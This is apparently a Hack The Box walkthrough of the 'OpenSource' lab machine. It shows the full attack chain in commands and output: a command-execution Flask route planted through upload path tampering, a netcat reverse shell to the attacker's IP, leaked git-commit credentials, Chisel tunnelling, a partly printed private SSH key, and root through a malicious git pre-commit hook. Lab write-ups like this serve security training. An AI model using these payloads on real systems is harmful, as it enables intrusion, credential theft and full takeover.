---
sidebar_label: 📭 OpenSource
description: ''
last_update:
  date: 2022/07/04
  author: Raúl Sánchez
tags:
  - git
  - Flask
  - BurpSuite
  - Reverse Shell - Python
  - Docker
  - Chisel
  - ProxyChains
  - RustScan
  - Gitea
  - pspy64
  - GTFOBins - git
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# OpenSource

![Overview.](opensource1.png)

> An easy machine where we will use git and struggle to get a reverse shell.

:::caution Disclaimer
No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️
:::

## Setting-up the Environment

First of all, start the machine and now we are going to use this [**script**](https://github.com/RaulSanchezzt/dotfiles/blob/master/scripts/htb.sh) to add the IP address and hostname of this box to the **hosts** file, **allow connections from the target** to our machine and create our working directory. I have defined the path of the script in the [`.zshrc`](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) file.

```bash
❯ which htb
htb: aliased to sh ~/dotfiles/scripts/htb.sh
```

We will run the script and write the information of this machine.&#x20;

```python
❯ htb
[!] /etc/hosts file restored from /etc/hosts.bak
[?] Type the IP address of the box: 10.10.11.164
[?] Type the name of the box: OpenSource

[!] Hack The Box Machine
10.10.11.164 opensource.htb

[!] Firewall
Status: active

     To                         Action      From
     --                         ------      ----
[ 1] Anywhere                   ALLOW IN    10.10.11.164              

[!] Working directory created
[!] Initial configuration completed
```

## 1. Enumeration

Now we can simply ping to domain name of the machine to check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 opensource.htb
PING opensource.htb (10.10.11.164) 56(84) bytes of data.
64 bytes from opensource.htb (10.10.11.164): icmp_seq=1 ttl=63 time=57.4 ms

--- opensource.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 57.435/57.435/57.435/0.000 ms
```

To identify which operating system is the target running. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool.

```python
❯ whichSystem.py opensource.htb

opensource.htb (ttl -> 63): Linux
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::

### 1.1 Nmap

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

* [-p-](https://nmap.org/book/nmap-overview-and-demos.html) : scan every TCP port \[0-65535].
* [--open](https://nmap.org/book/man-port-scanning-basics.html) : show only the applications that are actively accepting TCP connections.
* [-sS](https://nmap.org/book/man-port-scanning-techniques.html) : set TCP SYN scan.
* [--min-rate 5000](https://nmap.org/book/man-performance.html) : send packets as fast as or faster than the given rate.
* [-vvv](https://nmap.org/book/osdetect-usage.html#osdetect-ex-scanme1) : increase the verbosity.
* [-n](https://nmap.org/book/host-discovery-dns.html) : No DNS resolution.
* [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
* {name}.htb : Target machine.
* [-oG](https://nmap.org/book/output-formats-grepable-output.html) : Grepeable output.
* allPorts : Output file name.

```python
❯ sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn opensource.htb -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-04 15:57 CEST
Initiating SYN Stealth Scan at 15:57
Scanning opensource.htb (10.10.11.164) [65535 ports]
Discovered open port 80/tcp on 10.10.11.164
Discovered open port 22/tcp on 10.10.11.164
Completed SYN Stealth Scan at 15:58, 17.48s elapsed (65535 total ports)
Nmap scan report for opensource.htb (10.10.11.164)
Host is up, received user-set (0.086s latency).
Scanned at 2022-07-04 15:57:50 CEST for 18s
Not shown: 65532 closed tcp ports (reset), 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 62

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 17.60 seconds
           Raw packets sent: 87050 (3.830MB) | Rcvd: 86017 (3.441MB)
```

This is the function that I have defined in the [zsh](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) configuration file to extract TCP ports.

```bash
❯ which extractPorts
extractPorts () {
    ports="$(cat $1 | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')" 
    ip_address="$(cat $1 | grep -oP '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' | sort -u | head -n 1)" 
    echo -e "\n${yellowColour}[*] Extracting information...${endColour}\n"
    echo -e "\t${grayColour}[*] IP Address:${endColour} ${greenColour} $ip_address${endColour}"
    echo -e "\t${grayColour}[*] Open ports:${endColour} ${redColour} $ports${endColour}\n"
    echo $ports | tr -d '\n' | xclip -sel clip
    echo -e "${blueColour}[*] Ports copied to clipboard${endColour}\n"
}
```

Use the command to extract the **TCP ports**.

```python
❯ extractPorts allPorts

[*] Extracting information...

    [*] IP Address:  10.10.11.164
    [*] Open ports:  22,80

[*] Ports copied to clipboard
```

We will see the open ports on the target machine so now, we are going to use [nmap](https://nmap.org/) again using the parameters below:

* [-sV](https://nmap.org/book/man-version-detection.html) : to see the services and their version.
* [-sC](https://nmap.org/book/man-nse.html) : to performs a script scan using the default set of scripts.
* [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
* [-p](https://nmap.org/book/scan-methods-ip-protocol-scan.html) : to determine which IP protocols are supported by target machine.
* {name}.htb : Target machine.
* [-oN](https://nmap.org/book/output-formats-normal-output.html) : Normal output.
* targeted : Output file name.

```python
❯ nmap -sV -sC -Pn -p22,80 opensource.htb -oN targeted
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-04 15:59 CEST
Nmap scan report for opensource.htb (10.10.11.164)
Host is up (0.080s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1e:59:05:7c:a9:58:c9:23:90:0f:75:23:82:3d:05:5f (RSA)
|   256 48:a8:53:e7:e0:08:aa:1d:96:86:52:bb:88:56:a0:b7 (ECDSA)
|_  256 02:1f:97:9e:3c:8e:7a:1c:7c:af:9d:5a:25:4b:b8:c8 (ED25519)
80/tcp open  http    Werkzeug/2.1.2 Python/3.10.3
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.1.2 Python/3.10.3
|     Date: Mon, 04 Jul 2022 13:59:08 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5316
|     Connection: close
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>upcloud - Upload files for Free!</title>
|     <script src="/static/vendor/jquery/jquery-3.4.1.min.js"></script>
|     <script src="/static/vendor/popper/popper.min.js"></script>
|     <script src="/static/vendor/bootstrap/js/bootstrap.min.js"></script>
|     <script src="/static/js/ie10-viewport-bug-workaround.js"></script>
|     <link rel="stylesheet" href="/static/vendor/bootstrap/css/bootstrap.css"/>
|     <link rel="stylesheet" href=" /static/vendor/bootstrap/css/bootstrap-grid.css"/>
|     <link rel="stylesheet" href=" /static/vendor/bootstrap/css/bootstrap-reboot.css"/>
|     <link rel=
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.1.2 Python/3.10.3
|     Date: Mon, 04 Jul 2022 13:59:08 GMT
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|     Connection: close
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
|_http-title: upcloud - Upload files for Free!
|_http-server-header: Werkzeug/2.1.2 Python/3.10.3
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.92%I=7%D=7/4%Time=62C2F22C%P=x86_64-pc-linux-gnu%r(GetRe
SF:quest,106C,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/2\.1\.2\x20Py
SF:thon/3\.10\.3\r\nDate:\x20Mon,\x2004\x20Jul\x202022\x2013:59:08\x20GMT\
SF:r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x205
SF:316\r\nConnection:\x20close\r\n\r\n<html\x20lang=\"en\">\n<head>\n\x20\
SF:x20\x20\x20<meta\x20charset=\"UTF-8\">\n\x20\x20\x20\x20<meta\x20name=\
SF:"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n
SF:\x20\x20\x20\x20<title>upcloud\x20-\x20Upload\x20files\x20for\x20Free!<
SF:/title>\n\n\x20\x20\x20\x20<script\x20src=\"/static/vendor/jquery/jquer
SF:y-3\.4\.1\.min\.js\"></script>\n\x20\x20\x20\x20<script\x20src=\"/stati
SF:c/vendor/popper/popper\.min\.js\"></script>\n\n\x20\x20\x20\x20<script\
SF:x20src=\"/static/vendor/bootstrap/js/bootstrap\.min\.js\"></script>\n\x
SF:20\x20\x20\x20<script\x20src=\"/static/js/ie10-viewport-bug-workaround\
SF:.js\"></script>\n\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=
SF:\"/static/vendor/bootstrap/css/bootstrap\.css\"/>\n\x20\x20\x20\x20<lin
SF:k\x20rel=\"stylesheet\"\x20href=\"\x20/static/vendor/bootstrap/css/boot
SF:strap-grid\.css\"/>\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20hre
SF:f=\"\x20/static/vendor/bootstrap/css/bootstrap-reboot\.css\"/>\n\n\x20\
SF:x20\x20\x20<link\x20rel=")%r(HTTPOptions,C7,"HTTP/1\.1\x20200\x20OK\r\n
SF:Server:\x20Werkzeug/2\.1\.2\x20Python/3\.10\.3\r\nDate:\x20Mon,\x2004\x
SF:20Jul\x202022\x2013:59:08\x20GMT\r\nContent-Type:\x20text/html;\x20char
SF:set=utf-8\r\nAllow:\x20GET,\x20OPTIONS,\x20HEAD\r\nContent-Length:\x200
SF:\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTML
SF:\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x2
SF:0\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equi
SF:v=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20
SF:</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Er
SF:ror\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:
SF:\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20requ
SF:est\x20version\x20\('RTSP/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20<p>Error\x20code\x20explanation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20B
SF:ad\x20request\x20syntax\x20or\x20unsupported\x20method\.</p>\n\x20\x20\
SF:x20\x20</body>\n</html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.12 seconds
```

As we see, there are open two ports, SSH and HTTP.

:::info
You can find the man page of nmap [here](https://nmap.org/book/toc.html).
:::info

### 1.2 Web

On the web we will find that we can download a `zip` file and upload files.

![Website.](opensource2.png)

We can use this to upload files.

![Upload files.](opensource3.png)

Unzip the file to see the content.

```bash
❯ unzip source.zip
Archive:  source.zip
❯ ls
app  config   build-docker.sh   Dockerfile  source.zip
```

In the Dockerfile we can see that this is a Flask app written in Python.

```python
❯ cat Dockerfile
───────┬────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: Dockerfile
       │ Size: 574 B
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ FROM python:3-alpine
   2   │ 
   3   │ # Install packages
   4   │ RUN apk add --update --no-cache supervisor
   5   │ 
   6   │ # Upgrade pip
   7   │ RUN python -m pip install --upgrade pip
   8   │ 
   9   │ # Install dependencies
  10   │ RUN pip install Flask
  11   │ 
  12   │ # Setup app
  13   │ RUN mkdir -p /app
  14   │ 
  15   │ # Switch working environment
  16   │ WORKDIR /app
  17   │ 
  18   │ # Add application
  19   │ COPY app .
  20   │ 
  21   │ # Setup supervisor
  22   │ COPY config/supervisord.conf /etc/supervisord.conf
  23   │ 
  24   │ # Expose port the server is reachable on
  25   │ EXPOSE 80
  26   │ 
  27   │ # Disable pycache
  28   │ ENV PYTHONDONTWRITEBYTECODE=1
  29   │ 
  30   │ # Set mode
  31   │ ENV MODE="PRODUCTION"
  32   │ 
  33   │ # Run supervisord
  34   │ CMD ["/usr/bin/supervisord", "-c", "/etc/supervisord.conf"]
───────┴────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────c
```

### 1.3 git

Using `git` tools we observe in the last commit were the ssh credentials of dev01.

```shell
❯ git branch
  dev
* public
❯ git log dev --oneline
c41fede (dev) ease testing
be4da71 added gitignore
a76f8f7 updated
ee9d9f1 initial
❯ git show a76f8f7
commit a76f8f75f7a4a12b706b0cf9c983796fa1985820
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:46:16 2022 +0200

    updated

diff --git a/app/.vscode/settings.json b/app/.vscode/settings.json
new file mode 100644
index 0000000..5975e3f
--- /dev/null
+++ b/app/.vscode/settings.json
@@ -0,0 +1,5 @@
+{
+  "python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python",
+  "http.proxy": "http://dev01:Soulless_Developer#2022@10.10.10.128:5187/",
+  "http.proxyStrictSSL": false
+}
diff --git a/app/app/views.py b/app/app/views.py
index f2744c6..0f3cc37 100644
--- a/app/app/views.py
+++ b/app/app/views.py
@@ -6,7 +6,17 @@ from flask import render_template, request, send_file
 from app import app
```

## 2. Foothold

### 2.1 Exploit Flask

Now we are going to edit the `views.py` file that contains the main functions of the program.

```bash
❯ cd app/app
❯ ls
static  templates  __init__.py  configuration.py  utils.py  views.py
❯ vim views.py
```

Add the following function at the end of the file.

```python
@app.route('/shell')
def cmd():
    return os.system(request.args.get('cmd')
```

Before we upload this file to the server, start `BurpSuite` to intercept the packet and change the path the file will be uploaded to.

![BurpSuite.](opensource4.png)

Then forward to the server again. We will see that the file has been uploaded.

![File uploaded.](opensource5.png)

Let’s try to ping ourselves from the server. Start a listener on Kali waiting for **ICMP** packets.

```bash
❯ sudo tcpdump icmp -i tun0 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
```

Use our new `/shell` function with the `cmd` parameter we created

```php
http://opensource.htb/shell?cmd=ping+-c+4+[YOUR_TUN0_IP]
```

![Ping from the server to us.](opensource6.png)

Ignore the error on the webpage. Looking back at Kali we see it worked!

```python
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
17:06:18.087543 IP opensource.htb > 10.10.16.18: ICMP echo request, id 4203, seq 0, length 64
17:06:18.087589 IP 10.10.16.18 > opensource.htb: ICMP echo reply, id 4203, seq 0, length 64
17:06:18.992343 IP opensource.htb > 10.10.16.18: ICMP echo request, id 4203, seq 1, length 64
17:06:18.992382 IP 10.10.16.18 > opensource.htb: ICMP echo reply, id 4203, seq 1, length 64
17:06:19.991676 IP opensource.htb > 10.10.16.18: ICMP echo request, id 4203, seq 2, length 64
17:06:19.991708 IP 10.10.16.18 > opensource.htb: ICMP echo reply, id 4203, seq 2, length 64
17:06:20.992656 IP opensource.htb > 10.10.16.18: ICMP echo request, id 4203, seq 3, length 64
17:06:20.992696 IP 10.10.16.18 > opensource.htb: ICMP echo reply, id 4203, seq 3, length 64
^C
8 packets captured
8 packets received by filter
0 packets dropped by kernel
```

Now we know we have connection It's time for a reverse shell! we can use Python to do **URL** encode it first

```python
❯ python3 -c "import urllib.parse; print(urllib.parse.quote('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.18 1337 >/tmp/f'))"
rm%20/tmp/f%3Bmkfifo%20/tmp/f%3Bcat%20/tmp/f%7C/bin/sh%20-i%202%3E%261%7Cnc%2010.10.16.18%201337%20%3E/tmp/f
```

Switch to a waiting `nc` listener to see we have a shell connected. After that add it as a parameter on the `/shell` endpoint like we did before and paste in the browser

```bash
❯ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.16.18] from (UNKNOWN) [10.10.11.164] 46567
/bin/sh: can't access tty; job control turned off
/app # ls -lsa /
total 72
     4 drwxr-xr-x    1 root     root          4096 Jul  4 12:08 .
     4 drwxr-xr-x    1 root     root          4096 Jul  4 12:08 ..
     0 -rwxr-xr-x    1 root     root             0 Jul  4 12:08 .dockerenv
     8 drwxr-xr-x    1 root     root          4096 May  4 16:35 app
     4 drwxr-xr-x    1 root     root          4096 Mar 17 05:52 bin
     0 drwxr-xr-x    5 root     root           340 Jul  4 12:08 dev
     4 drwxr-xr-x    1 root     root          4096 Jul  4 12:08 etc
     4 drwxr-xr-x    2 root     root          4096 May  4 16:35 home
     4 drwxr-xr-x    1 root     root          4096 May  4 16:35 lib
     4 drwxr-xr-x    5 root     root          4096 May  4 16:35 media
     4 drwxr-xr-x    2 root     root          4096 May  4 16:35 mnt
```

We see that this is a **docker** container with a little enumeration

```python
/app # arp
? (172.17.0.1) at 02:42:c9:a9:24:1a [ether]  on eth0
/app # route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         172.17.0.1      0.0.0.0         UG    0      0        0 eth0
172.17.0.0      *               255.255.0.0     U     0      0        0 eth0
/app # netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      9/python
tcp        0      0 172.17.0.4:80           10.10.16.18:36428       ESTABLISHED 27382/python
tcp        0      0 172.17.0.4:33179        10.10.16.18:443         CLOSE_WAIT  22650/nc
tcp        0      1 172.17.0.4:46071        10.10.16.16:1337        SYN_SENT    4248/nc
tcp        0      0 172.17.0.4:80           172.17.0.1:40874        TIME_WAIT   -
tcp        1      0 172.17.0.4:80           10.10.16.18:36418       CLOSE_WAIT  27382/python
tcp        0      0 172.17.0.4:36379        10.10.16.18:443         CLOSE_WAIT  22623/nc
tcp        0     54 172.17.0.4:46567        10.10.16.18:1337        ESTABLISHED 4269/nc
netstat: /proc/net/tcp6: No such file or directory
netstat: /proc/net/udp6: No such file or directory
netstat: /proc/net/raw6: No such file or directory
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node PID/Program name    Path
/app # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:04  
          inet addr:172.17.0.4  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:224757 errors:0 dropped:0 overruns:0 frame:0
          TX packets:224524 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:18883418 (18.0 MiB)  TX bytes:133703661 (127.5 MiB)
```

So the container we are insides IP is `172.17.0.5`. The host IP is `172.17.0.1`, which is probably the internal IP of the main box on `10.10.11.164`.

### 2.2 Chisel

Let’s use [Chisel](https://github.com/jpillora/chisel) to create a reverse proxy.

```python
❯ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
❯ gunzip chisel_1.7.7_linux_amd64.gz
```

Start Chisel on Kali listening on port `4444` and with reverse port forwarding enabled

```python
❯ ./chisel_1.7.7_linux_amd64 server --reverse --port 4444
2022/07/04 17:17:17 server: Reverse tunnelling enabled
2022/07/04 17:17:17 server: Fingerprint HTkkakhWm5qy07rKxSeZjWNRrDESyJlCDtnjQ/rNegY=
2022/07/04 17:17:17 server: Listening on http://0.0.0.0:4444
2022/07/04 17:19:56 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
```

Now start a web server so we can pull that file over to our target box

```python
❯ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

Switch back to our shell on the box, grab the file and start `Chisel` in client mode

```python
/app # cd /tmp
/tmp # wget http://10.10.16.18:8000/chisel_1.7.7_linux_amd64     
Connecting to 10.10.16.18:8000 (10.10.16.18:8000)
saving to 'chisel_1.7.7_linux_amd64'
chisel_1.7.7_linux_a 100% |********************************| 7888k  0:00:00 ETA
'chisel_1.7.7_linux_amd64' saved
/tmp # chmod +x chisel_1.7.7_linux_amd64
/tmp # ./chisel_1.7.7_linux_amd64 client 10.10.16.18:4444 R:socks
2022/07/04 15:19:54 client: Connecting to ws://10.10.16.18:4444
2022/07/04 15:19:56 client: Connected (Latency 162.286207ms)
```

Here we’ve told Chisel to connect to Kali on IP 10.10.14.166 port 4444. The R:socks options is used for the reverse connection.

To be able to tunnel **TCP** commands on Kali through Chisel to the box we need to use [**proxychains**](https://github.com/haad/proxychains). One last thing to do is add our socks5 proxy address mentioned above in to our proxychains config file so it knows which local port to direct the traffic to. Copy the **conf** file and then add our **socks5** line at the end.

```bash
❯ sudo cp /etc/proxychains4.conf /etc/proxychains.conf
❯ cat /etc/proxychains.conf
#socks4     127.0.0.1 9050
socks5 127.0.0.1 1080
```

### 2.3 RustScan

We can now use `proxychains` with our reverse proxy tunnel provided by Chisel. For another bit of practice let’s use [Rustscan](https://github.com/RustScan/RustScan) to look for open ports.

```python
❯ wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb
❯ sudo dpkg -i rustscan_2.0.1_amd64.deb
```

Now use it to scan those ports we’ve confirmed are open

```python
❯ proxychains4 rustscan -a 172.17.0.1 -p 22,80,3000
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/raul/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.1:22  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.1:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.17.0.1:3000  ...  OK
Open 172.17.0.1:22
Open 172.17.0.1:80
Open 172.17.0.1:3000
```

That’s proved we can get to those ports from Kali via `Chisel`, through the container on IP `172.17.0.5` and across to the internal IP of the box on `172.17.0.1`.

### 2.4 Gitea

Let’s have a look at **Gitea** on port `3000`. First set a new proxy configuration on `FoxyProxy`

![Socks5 configuration.](opensource7.png)

Now we can browse to the website

![Gitea website.](opensource8.png)

To proceed we need to use those credentials we found earlier in the git commit

```python
dev01:Soulless_Developer#2022
```

![Sing In.](opensource9.png)

In the repo called `home-backup` we can find their `ssh` keys, let’s copy the `id_rsa` file containing the private key

![Download id\_rsa file.](opensource10.png)

Now we can `ssh` in as the `dev01` user. Here we will find the user flag!

```properties
❯ catnl id_rsa
───────┬────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: id_rsa
       │ Size: 3.2 KB
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ -----BEGIN RSA PRIVATE KEY-----
   2   │ MIIJKQIBAAKCAgEAqdAaA6cYgiwKTg/6SENSbTBgvQWS6UKZdjrTGzmGSGZKoZ0l
   3   │ xfb28RAiN7+yfT43HdnsDNJPyo3U1YRqnC83JUJcZ9eImcdtX4fFIEfZ8OUouu6R
   4   │ u2TPqjGvyVZDj3OLRMmNTR/OUmzQjpNIGyrIjDdvm1/Hkky/CfyXUucFnshJr/BL

❯ chmod 600 id_rsa

❯ ssh -i id_rsa dev01@opensource.htb
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-176-generic x86_64)
Last login: Mon Jul  4 13:20:25 2022 from 10.10.14.110

-bash-4.4$ ls
user.txt
-bash-4.4$ cat user.txt
```

### 2.5 Pspy64

On Kali grab [pspy64](https://github.com/DominicBreuker/pspy) and start a web server so we can get to it

```python
❯ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
```

Back over to our ssh session on the box, pull `pspy` over

```bash
-bash-4.4$ wget http://10.10.16.18:8000/pspy64 
-bash-4.4$ chmod +x pspy64 
-bash-4.4$ ./pspy64 
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     
```

Amongst the output we can see above there is a git commit running every minute. With the git commit being run regularly we can use the `pre-commit` file to execute commands before the commit is done. In [gtfobins](https://gtfobins.github.io/gtfobins/git/) we can see some examples.

```bash
-bash-4.4$ echo "chmod u+s /bin/bash" >> ~/.git/hooks/pre-commit
-bash-4.4$ chmod +x !$
    chmod +x ~/.git/hooks/pre-commit
-bash-4.4$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1113504 Apr 18 15:08 /bin/bash
-bash-4.4$ bash -p
```

Finally, we’ve made it to **root**, let’s grab the flag!&#x20;

```bash
bash-4.4# whoami
root
bash-4.4# cat /root/root.txt
```

I hope you made it too, see you next timee! 🙃
